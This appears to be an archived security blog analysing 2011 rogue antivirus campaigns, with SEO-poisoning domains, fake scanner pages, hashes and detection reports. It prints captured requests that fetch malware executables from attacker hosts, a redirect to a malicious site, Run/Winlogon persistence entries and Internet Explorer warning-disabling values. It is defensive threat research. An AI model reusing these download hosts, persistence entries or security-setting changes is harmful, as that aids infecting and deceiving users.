Tag Archives: rogue

Suspicious activity for domains .co.cc

While doing some google searches for particular keywords, with a specific google search we have noted that in some cases the websites found have the same URL after the .co.cc and that all of them use a $_GET[‘k’] query related to the keyword I was searching for. Almost all the links found have also the same HTML template and they look like to be non-live websites, maybe are used to capture keywords or are related to some kind of SEO poisoning activity:

Image

The secret has been revealed:

GET /index.php?k=virus-scan HTTP/1.1
Host: liostimoremvfk.co. cc

Response:

HTTP/1.1 302 Found
Date: Tue, 19 Apr 2011 16:43:03 GMT
Server: Apache/2.2.9 (Debian) DAV/2 SVN/1.4.2 PHP/5.2.6-1+lenny8 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny8
Location: hxxp://includingwhich.cz. cc/in.cgi?4&seoref=[...]
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20
Connection: close
Content-Type: text/html
 
....................

There is a redirect to… guess what ? A fake scanner page…

Image

Image

Is prompted a popup window to download the rogue security software setup:

Image

Network traffic:

GET /get_file.php?id=16 HTTP/1.1
Host: mywebavck-2.co. cc
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.2.16) Gecko/20110319 Firefox/3.6.16
 
HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 14:41:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Content-Description: File Transfer
Content-Length: 331776
Content-Disposition: attachment; filename="setup.exe"
Connection: close
Content-Type: application/download
 
MZ......................@..................[...]

The setup file looks like to be almost undetected by Antiviruses:

Report date: 2011-04-19 16:51:48 (GMT 1)
File name: setup-exe
File size: 331776 bytes
MD5 hash: c6adf910c8e56b4b0577ddface41898d
SHA1 hash: 978794a9705fec3f5dd5d7256b147a75d6c6f6fe
Detection rate: 0 on 10 (0%)
Status: CLEAN

Few malicious domains .co.cc used to capture keywords:

plandicardyu9.co.cc/index.php?k=Spun
pensvernohp.co.cc/index.php?k=16-blocks-wiki
jacbocome6.co.cc/index.php?k=Pianist,-The
setibetkeee8r.co.cc/index.php?k=xXx
vacuumguide.co.cc/index.php?k=loop
vacuumreview.co.cc/index.php?k=actress
catbepow372.co.cc/index.php?k=Few-Good-Men,-A
loismolaqimvab.co.cc/index.php?k=Upside-of-Anger,-The
loismolaqimvab.co.cc/index.php?k=007-goldeneye
nutnorbntegiw0.co.cc/index.php?k=Hoodwinked!
pordisfpoc64.co.cc/index.php?k=faculty-the
bustmiswoodckosnh.co.cc/index.php?k=Webs
bustmiswoodckosnh.co.cc/index.php?k=007-The-Spy-Who-Loved-Me
lrecamac8r4.co.cc/index.php?k=Shaft
phoderadc9i.co.cc/index.php?k=Sentinel,-The
buzzpozapyq5.co.cc/index.php?k=Freedomland
tionforhardversry.co.cc/index.php?k=007-Octopussy
scesniasay3u.co.cc/index.php?k=Prince-and-Me-2,-The
rohislantsello.co.cc/index.php?k=Grind
xpowgihydreegk.co.cc/index.php?k=Gladiatress
xpowgihydreegk.co.cc/index.php?k=15-minutes-pr
buitalanbu6.co.cc/index.php?k=Ali
arenelx1l.co.cc/index.php?k=Open-Range
saduhydsp.co.cc/index.php?k=007-Goldfinger
saiclevaps1s.co.cc/index.php?k=Alien:-Resurrection
hoerhinbendescrt.co.cc/index.php?k=Core,-The
fledunoutin5t.co.cc/index.php?k=21-grams-casting-director
teoucbosonenfo.co.cc/index.php?k=Rules-of-Attraction,-The
apsagsoumyp42o.co.cc/index.php?k=Predator-2
fanbaperpeisg.co.cc/index.php?k=Dungeons
metersaddrantb7.co.cc/index.php?k=Fast-and-the-Furious,-The
ibsummabobs1q.co.cc/index.php?k=Body,-The
tingrobfoz60.co.cc/index.php?k=15-minutes-of-shame
macronessi9.co.cc/index.php?k=1941
macronessi9.co.cc/index.php?k=When-a-Stranger-Calls
filtsubscalsuvrl.co.cc/index.php?k=Die-Hard:-With-a-Vengeance
siidosantv.co.cc/index.php?k=007-Licence-to-Kill
siidosantv.co.cc/index.php?k=Get-Shorty
questeprap28.co.cc/index.php?k=Bourne-Identity,-The
geoganshi5n5.co.cc/index.php?k=Jaws-2
riapaewarmcooksbm.co.cc/index.php?k=007-live-and-let-die-online
decapivetr.co.cc/index.php?k=Changing-Lanes
ictiforkh.co.cc/index.php?k=Cheaper-by-the-Dozen
ictiforkh.co.cc/index.php?k=Spun
sandsatdar3.co.cc/index.php?k=Dances-with-Wolves
gatthanbastams.co.cc/index.php?k=Hudsucker-Proxy,-The
gatthanbastams.co.cc/index.php?k=Cellular
deathstippark1h.co.cc/index.php?k=English-Patient,-The
deathstippark1h.co.cc/index.php?k=Clerks.
crowpaetucep95m.co.cc/index.php?k=Clerks.
adefarichz.co.cc/index.php?k=Dogma
adefarichz.co.cc/index.php?k=16-blocks-review
talcoutip2y.co.cc/index.php?k=Pride
opupreggazti.co.cc/index.php?k=Fahrenheit-9/11
opupreggazti.co.cc/index.php?k=bewitched-cast
sqeestheogwenrepm83.co.cc/index.php?k=Bread-and-Roses
pekiguaningmv.co.cc/index.php?k=Rollerball
congrinaleo.co.cc/index.php?k=View-from-the-Top
cuttcanthnaznu.co.cc/index.php?k=Scream-3
kannmowarmq2.co.cc/index.php?k=Cliffhanger
gesnecalti7qc.co.cc/index.php?k=U-571
parlandcolrac1u.co.cc/index.php?k=Scream-2
rapaconptf.co.cc/index.php?k=Ali
profifreturqn.co.cc/index.php?k=007-Octopussy
dendthylthejnu.co.cc/index.php?k=Mummy,-The
ictiforkh.co.cc/index.php?k=Corky-Romano

Note that the value after k= is same as page title!

Other related malicious domains:

apsagsoumyp42o.co.cc
cklik.in
degreesupplies.cz.cc
montlimal.co.cc
optimizes.cz.cc
sadrfedwer.co.cc
talcoutip2y.co.cc
volecap.cz.cc
www.cklik.in
yhnecqapp.co.cc

All these malicious domains appear to be hosted in this IP address:

95.169.191.217
ns2.km35913.keymachine.de
95.169.160.0/19 - Keyweb AG IP Network
AS31103 - KEYWEB-AS Keyweb AG

IPVoid analysis:

http://www.ipvoid.com/scan/95.169.191.217

Malicious URLs Hosting Fake Scanner Pages

We have detected few fake scanner pages that are still active and that distribute the dangerous executable files of rogue security software.

First initial fake alert:

Image

Fake scanner page in action:

Image

Prompt to download the (infected) setup file of the rogue software:

Image

Report date: 2011-04-15 01:10:23 (GMT 1)
File name: bestav2-exe
File size: 374784 bytes
MD5 hash: a31da4fa72e277fe8abf298a4aa30d9d
SHA1 hash: 0f7bb119ff7889d3981d8ecdf2494c1cf4ba1a42
Detection rate: 7 on 10 (70%)
Status: INFECTED
Antivirus Database Engine Result
Avast 15/04/2011 5.0 Win32:Renos-ACT [Trj]
AVG 15/04/2011 10.0.0.1190 FakeAlert.AAW
Avira AntiVir 15/04/2011 8.2.4.202 TR/Winwebsec.A.4010
Comodo 15/04/2011 4.0 TrojWare.Win32.Trojan.Agent.Gen
Emsisoft 15/04/2011 5.1.0.2 Trojan.Fakealert!IK
F-Prot 15/04/2011 6.3.3.4884 W32/FakeAlert.LY.gen!Eldorado
Ikarus 15/04/2011 T31001097 Trojan.Fakealert

There is also a reference to an external JS file:

<script type="text/javascript" src="hxxp://figaroo. ru/tools/ip.js"></script>

List of malicious domains and IPs:

hxxp://www.downloadmyprog. biz
hxxp://91.213.217.247:80
hxxp://184.82.159.52:80
hxxp://91.213.217.244:80
hxxp://91.213.217.246:80
hxxp://www.ratingswatchdiscussions. com
hxxp://91.213.217.225:80
hxxp://184.82.159.51:80
hxxp://91.213.217.229:80
hxxp://184.82.159.52:80
hxxp://www.powerwerxmotorcorp. com
hxxp://91.213.217.241:80
hxxp://www.purityanddivinityspa. com

At the end of few fake scanner pages, there is also a surprise:

Image

An obfuscated malicious JS code (note also the random function names at the end of the script) that leads most probably to an exploit kit. We can extract also the JS code from the file “/index_files/set00000.js”, used to display the fake threats in the fake scanner page:

Image

URLVoid domain analysis:

http://www.urlvoid.com/scan/downloadmyprog.biz
http://www.urlvoid.com/scan/ratingswatchdiscussions.com
http://www.urlvoid.com/scan/purityanddivinityspa.com
http://www.urlvoid.com/scan/powerwerxmotorcorp.com

Recent malicious URLs analyzed

Report containing malicious urls logged:

GET /asp/xg.asp HTTP/1.0
User-Agent: BF
Host: ac6211.91mt.com
 
GET /asp/xg.asp HTTP/1.0
User-Agent: BF
Host: zc8278.91mt.com
 
GET /exe/key/key4_0322.exe HTTP/1.0
User-Agent: BF
Host: ac6211.91mt.com
 
GET /exe/key/key_0323.exe HTTP/1.0
User-Agent: BF
Host: zc8278.91mt.com
 
POST /piastro.php?ini=XXX HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: deltadataserve.in
 
GET /asp/xg.asp HTTP/1.0
User-Agent: BF
Host: om4089.91mt.com
 
GET /asp/xg.asp HTTP/1.0
User-Agent: BF
Host: cz5834.91mt.com
 
GET /exe/key/key_0323.exe HTTP/1.0
User-Agent: BF
Host: om4089.91mt.com
 
GET /exe/key/key_0323.exe HTTP/1.0
User-Agent: BF
Host: cz5834.91mt.com
 
GET /asp/xg.asp HTTP/1.0
User-Agent: BF
Host: bq8378.91mt.com
 
GET /exe/key/key_0323.exe HTTP/1.0
User-Agent: BF
Host: bq8378.91mt.com
 
GET /zz7654/cfg.bin HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: yuyu98.com
 
GET /zlv.exe HTTP/1.0
User-Agent: Mozilla
Host: aaphonecard.com
 
GET /maya.exe HTTP/1.0
User-Agent: Mozilla
Host: aaphonecard.com
 
POST /zz7654/g765.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: yuyu98.com
 
GET /e.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: casinovergelijker.com
 
GET /wawxb/kllpcttkx.php?adv=adv477&id=XXX&c=XXX HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)ver71
Host: abcartel.com
 
GET /emikavigat.html HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)ver71
Host: xudezyj903.virtue.nu
 
GET /otasenaqynec.html HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)ver71
Host: opytibuxi.virtue.nu
 
GET / HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)ver71
Host: newpharmacyschools.ru
 
GET /exe/key/key_0323.exe HTTP/1.0
User-Agent: BF
Host: ql578.91mt.com
 
GET /asp/xg.asp HTTP/1.0
User-Agent: BF
Host: jz9233.91mt.com
 
GET /asp/xg.asp HTTP/1.0
User-Agent: BF
Host: jz9233.91mt.com
 
GET /exe/key/key_0323.exe HTTP/1.0
User-Agent: BF
Host: jz9233.91mt.com
 
GET /asp/xg.asp HTTP/1.0
User-Agent: BF
Host: xx7314.91mt.com
 
GET /exe/key/key_0323.exe HTTP/1.0
User-Agent: BF
Host: xx7314.91mt.com
 
GET /files/453734526/nig.exe HTTP/1.0
User-Agent: Mozilla
Host: rapidshare.com
 
GET /dw/dm.php?id=XXX&ver=dm0&v=2011_03_05&er=S_wd_rd_wrd_rrd_we_re_wc_rc_W5.1- HTTP/1.0
User-Agent: Mozilla/4.0 (SP3 WINLD)
Host: comcmdrun.com
 
GET /fast-scan/ HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: jeqtzjte.co.cc
 
GET /install.34556.exe HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: thepackplace.in
 
GET /dl.php?i=15 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 2367.in
 
GET / HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: releaseantivirus.com

URLVoid domain analysis:

http://www.urlvoid.com/scan/comcmdrun.com
http://www.ipvoid.com/scan/222.88.205.195
http://www.urlvoid.com/scan/xx7314.91mt.com
http://www.urlvoid.com/scan/jz9233.91mt.com
http://www.urlvoid.com/scan/ql578.91mt.com
http://www.urlvoid.com/scan/newpharmacyschools.ru
http://www.urlvoid.com/scan/opytibuxi.virtue.nu
http://www.urlvoid.com/scan/xudezyj903.virtue.nu
http://www.urlvoid.com/scan/abcartel.com
http://www.urlvoid.com/scan/casinovergelijker.com
http://www.urlvoid.com/scan/yuyu98.com
http://www.urlvoid.com/scan/aaphonecard.com
http://www.urlvoid.com/scan/bq8378.91mt.com
http://www.urlvoid.com/scan/cz5834.91mt.com
http://www.urlvoid.com/scan/om4089.91mt.com
http://www.urlvoid.com/scan/om4089.91mt.com
http://www.urlvoid.com/scan/deltadataserve.in
http://www.urlvoid.com/scan/zc8278.91mt.com
http://www.urlvoid.com/scan/ac6211.91mt.com
http://www.urlvoid.com/scan/jeqtzjte.co.cc
http://www.urlvoid.com/scan/thepackplace.in
http://www.urlvoid.com/scan/2367.in
http://www.urlvoid.com/scan/releaseantivirus.com

New Rogue Software: Windows Support System

Windows Emergency System (similar to Windows Emergency System) is another rogue security software that aims to scan the system to find errors, instead it shows fake errors, stating it is needed to buy the full version of the software to fix the non-existent errors.

Windows Support System GUI

Fake security alerts:

Fake security alerts

Fake scanner page:

Fake scanner page

Other fake security alert:

Fake security alerts

Regedit is disabled:

Regedit disabled

Installer screenshot:

Installer

Windows Support System is distributed and spreaded by web exploit kits:

GET /count8.php HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: falsewi. com
 
GET /showthread.php?t=335918 HTTP/1.0
Referer: hxxp://sweetvegetables.gv.vg/showthread.php?t=4005006
Host: sweetvegetables.gv. vg

Setup.exe is downloaded:

HTTP/1.1 200 OK
Date: Tue, 22 Mar 2011 00:50:50 GMT
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary
Content-Length: 18944
Content-Disposition: inline; filename=setup.exe

Report date: 2011-03-22 02:40:57 (GMT 1)
File name: setup.exe
File size: 18944 bytes
MD5 hash: d94f2733e1fa56dd00431927f72b68da
SHA1 hash: 8114e64151a8d64f4364933eb1e9cb28a39693bc
Detection rate: 0 on 9 (0%)
Status: CLEAN

Fake scanner page:

GET /fast-scan/ HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: mbbckoua.co. cc

Download of another rogue security software:

GET /BestAntivirus2011.exe HTTP/1.0
Referer: hxxp://mbbckoua.co. cc/fast-scan/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: dl.mbbckoua.co. cc

Report date: 2011-03-22 02:40:57 (GMT 1)
File name: bestantivirus2011-exe
File size: 323584 bytes
MD5 hash: dcd660aa86a5cba024ce9d01bb76f45a
SHA1 hash: 3e85fa411bf9cb44049d61382cd95a66b7fb2180
Detection rate: 0 on 9 (0%)
Status: CLEAN

Another web exploit that distribute Windows Support System:

GET /1010/in.cgi?10 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: roleplaysanctuary.co. cc

Suspicious redirection:

<html>
<head>
<meta http-equiv="REFRESH" content="1; URL='hxxp://erofax. ru/podm/go.php'">
</head>
<body>
document moved <a href="hxxp://erofax. ru/podm/go.php">here</a>
</body>
</html>

Fake scanner page:

GET /scan1b/images/sprite.png HTTP/1.0
Referer: hxxp://antivirus-9465.co. cc/scan1b/164
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: antivirus-9465.co. cc

Download of setup file of Windows Support System:

GET /scan1b/164/freesystemscan.exe HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: antivirus-9465.co. cc

Fake payment system:

GET /soft-usage/favicon.ico?0=1200&1=XXX&2=i-s&3=164&4=2600&5=5&6=1&7=62900.2180&8=1040 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: soft-store-inc. com

URLVoid domain analysis:

http://www.urlvoid.com/scan/falsewi.com
http://www.urlvoid.com/scan/sweetvegetables.gv.vg
http://www.urlvoid.com/scan/mbbckoua.co.cc
http://www.urlvoid.com/scan/dl.mbbckoua.co.cc
http://www.urlvoid.com/scan/erofax.ru
http://www.urlvoid.com/scan/roleplaysanctuary.co.cc
http://www.urlvoid.com/scan/antivirus-9465.co.cc
http://www.urlvoid.com/scan/soft-store-inc.com
http://www.urlvoid.com/scan/dl.juoiossf.co.cc
http://www.urlvoid.com/scan/juoiossf.co.cc
http://www.urlvoid.com/scan/dl.your-fast-antivirus-scan.cw.cm
http://www.urlvoid.com/scan/your-fast-antivirus-scan.cw.cm

New Rogue Software: Windows Emergency System

Windows Emergency System is another rogue security software that aims to scan the system to find errors, instead it shows fake errors, stating it is needed to buy the full version of the software to fix the non-existent errors.

Windows Emergency System GUI

Screenshot of the installer:

Windows Emergency System Installer

Payment page:

soft-store-inc-com

Network traffic:

GET /soft-usage/favicon.ico?0=1200&1=XXX&2=i&3=85&4=2600&5=5&6=1&7=62900.2096&8=1040 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: soft-store-inc.com

Whois:

Domain Name:	SOFTSTORE-INC.COM
Registrar:	DOMAINCONTEXT, INC.
Whois Server:	whois.domaincontext.com
Referral URL:	http://www.domaincontext.com
Name Server:	NS1.REGWAY.COM
Name Server:	NS2.REGWAY.COM
Status:	clientTransferProhibited
Updated Date:	05-mar-2011
Creation Date:	05-mar-2011
Expiration Date:	05-mar-2012

Network traffic:

GET /payment_forms/default/css/pay.css HTTP/1.1
Referer: http://softstore-inc.com/85/40/form/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: softstore-inc.com

Whois:

Domain Name:	SOFT-STORE-INC.COM
Registrar:	DOMAINCONTEXT, INC.
Whois Server:	whois.domaincontext.com
Referral URL:	http://www.domaincontext.com
Name Server:	NS1.REGWAY.COM
Name Server:	NS2.REGWAY.COM
Status:	clientTransferProhibited
Updated Date:	05-mar-2011
Creation Date:	05-mar-2011
Expiration Date:	05-mar-2012

Malicious domains:

http://www.urlvoid.com/scan/soft-store-inc.com
http://www.urlvoid.com/scan/softstore-inc.com

Other suspicious domains:

http://www.urlvoid.com/scan/getsomepornhere.net
http://www.urlvoid.com/scan/softstorecorp2012.com
http://www.urlvoid.com/scan/softstorecorp2011.com

The malware that installed this rogue software, created few files in C:\ folder:

C:\kill.txt
C:\avenger.txt
C:\cleanup.exe
C:\TITI.exe

Content of C:\

The malware used a legit security tool named “Avenger” to remove Antiviruses:

kill.txt

avenger.txt

New Rogue Software: Security Essentials 2011

Security Essentials 2011 is another rogue security software that is installed by TDSS variants or by drive-by downloads and that aims to scan the system to find trojans, instead it shows fake security alerts, stating it is needed to buy the full version of the software to remove the non-existent detected threats.

File name: setupse2011-exe
File size: 2522624 bytes
MD5 hash: 4a17665f5abf68f89046923cbb33c372
SHA1 hash: b8e2e084eccae7be98652f960ad1a4e646871b80
Detection rate: 6 on 16 (38%)
Status: INFECTED

SE2011 GUI

Security Essentials 2011 prevents the execution of regedit, task manager, notepad and other system utilities that could be used to the remove the program. False security alerts are also displayed very frequent and alert the user about unexistent detected threats and network attacks:

SE2011 Fake Alert

SE2011 IP Attacks Alerts

Files created:

SE2011 Files

%AllUsers%\Application Data\Security Essentials 2011\SE2011.exe
%AllUsers%\Application Data\Security Essentials 2011\sefkls\
%AllUsers%\Application Data\Security Essentials 2011\sefkls\sembkasbs.cfg
%UserProfile%\Desktop\Security Essentials 2011.lnk
%UserProfile%\Start Menu\Security Essentials 2011.lnk
%UserProfile%\Application Data\Microsoft\Internet Explorer\Quick Launch\Security Essentials 2011.lnk

Registry modifications:

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"updatesst"="%AllUsers%\Application Data\Security Essentials 2011\SE2011.exe"
 
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="%AllUsers%\Application Data\Security Essentials 2011\SE2010.exe" /hide"
 
[HKEY_CURRENT_USER\Software\SE2010]
"LastVFC"="25"
"LastD"="3"
"LastScan"="03.01.2011 17.09"

Dangerous domains:

se-2011-download. com
se-2011-payment. com
get-se-2011. com/loads.php?code=00000090
get-se2011. com/v.txt
get-se-2011. com/cgi-bin/ware.cgi?adv=00000090
get-se-2011. com/Grabber
supercybersecurity. com/adv23.exe
get-se2011. com
get-se-2011. com
ns1.supercybersecurity. com
ns2.supercybersecurity. com
supercybersecurity. com

URLVoid domain analysis:

se-2011-download. com
se-2011-payment. com
get-se-2011. com
get-se2011. com
supercybersecurity. com

New Rogue Software: Easy Scan

Easy Scan is another rogue security software that is installed by TDSS variants and that aims to scan the hard drive to find errors, instead it shows fake errors, stating it is needed to buy the full version of the software to repair the non-existent errors.

Easy Scan GUI

File name: 6gvbwczovyxs-exe
File size: 387072 bytes
MD5 hash: 1aacd2bc86b8e3226a39fb6484803b2e
SHA1 hash: 09e81887484c90814ce9b8e5e0caf89980663ddb
Detection rate: 3 on 16 (19%)
Status: INFECTED

File Version Info:

StringFileInfo
000004b0
LegalCopyright
mdisk Corp . All rights reserved.
CompanyName
mdisk Corp
FileDescription
mdisk
FileVersion
952
ProductVersion
101
InternalName
mdisk
OriginalFilename
mdisk
ProductName
mdisk

File name: cvmmcsnbgpjqkx-exe
File size: 478720 bytes
MD5 hash: 7d42fb11e3e533d18eda29b2ca2e6213
SHA1 hash: 97dc3a6255f8feacb32094d12bf998858d06fa53
Detection rate: 3 on 16 (19%)
Status: INFECTED

File Version Info:

StringFileInfo
000004b0
LegalCopyright
ms SQL Software.
CompanyName
msql software
FileDescription
msql
FileVersion
152
ProductVersion
101
InternalName
msql
OriginalFilename
msql
ProductName
msql software

As most rogue security software, Easy Scan prevents the execution of regedit, task manager and other system utilities that could be used to the remove the program. False security alerts are also displayed very frequent from the system tray icon:

Fake Alerts

Order page:

Order page

Network traffic:

GET /dfrg/dfrgr HTTP/1.1
User-Agent: Internet Explorer
Host: clickbrave. org
 
GET /dfrg/dfrg HTTP/1.1
User-Agent: Internet Explorer
Host: searchmiddle. org
 
GET /customers/buy.php?pid=DEFRAG_NNM_BASIC&id=440&subid=01 HTTP/1.1
Host: searchmiddle.org
 
HTTP/1.1 302 Found
Location: hxxps://secure.paymentsprivate. com/defragmenter?product_sku=DEFRAG_NNM_BASIC,DEFRAG_NNM_PREMIUM&default_sku=1&view_eds=1&check_eds=1&affiliate_id=440&affiliate_sid=01
Vary: Accept-Encoding

Domain analysis:

clickbrave. org91.200.242.17
searchmiddle. org95.169.190.192
secure.paymentsprivate. com92.48.127.141
paymentsprivate. com92.48.127.141

Files created:

Easy Scan - Files

Executable file:

Executable File

Desktop icon:

Desktop Icon

Registry startup entry:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run
%AllUsers%\Application Data\6GVBWCzOVYxS.exe

Interesting is that after some time we noticed new fake security alerts that remembered us the previously analyzed rogue security software named HDD Doctor:

HDD Doctor Alerts

The new HDD Doctor has removed completely the previously installed rogue software Easy Scan and then it has installed itself in the system, starting to display the false disk errors alerts.

New Rogue Software: HDD Doctor

HDD Doctor is another rogue security software that aims to scan the hard drive to find errors, instead it shows fake errors, stating it is needed to buy the full version of the software to fix the non-existent errors.

File name: hdddoctor-exe
File size: 326656 bytes
MD5 hash: eb3e1826afad946a456f9c6b953815ee
SHA1 hash: 6d969d2d010fd783f199cda7442f6824227a6220
Detection rate: 4 on 16 (25%)
Status: INFECTED

HDD Doctor prevents the execution of regedit:

HDD Doctor Alert

The system disk contains a large number of critical errors (fake):

Fake security alerts

And voilĂ , HDD Doctor is installed:

HDD Doctor

Serious system errors (fake):

System errors

Activate full version now ?

Activate full version

Order page:

Purchase page

Network traffic:

33.oneworldbill. com/07/index_new.php?id=02921
33.oneworldbill. com/07/tpb.jpg

Domain analysis:

33.oneworldbill. com212.117.162.149

Files created:

%UserProfile%\Application Data\hdddoctor.exe
%UserProfile%\Application Data\install_hdd
%UserProfile%\Desktop\HDD Doctor.lnk
%UserProfile%\Start Menu\Programs\HDD Doctor.lnk

Executable file:

hdddoctor.exe

HDD Doctor on Desktop:

HDD Doctor Desktop Icon

Registry startup entry:

HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
c:\Documents and Settings\Administrator\Application Data\hdddoctor.exe

HDD Doctor hijacks also few Internet Explorer settings:

HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings
"WarnonBadCertRecving" = '0'
 
HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings
"WarnOnPostRedirect" = '0'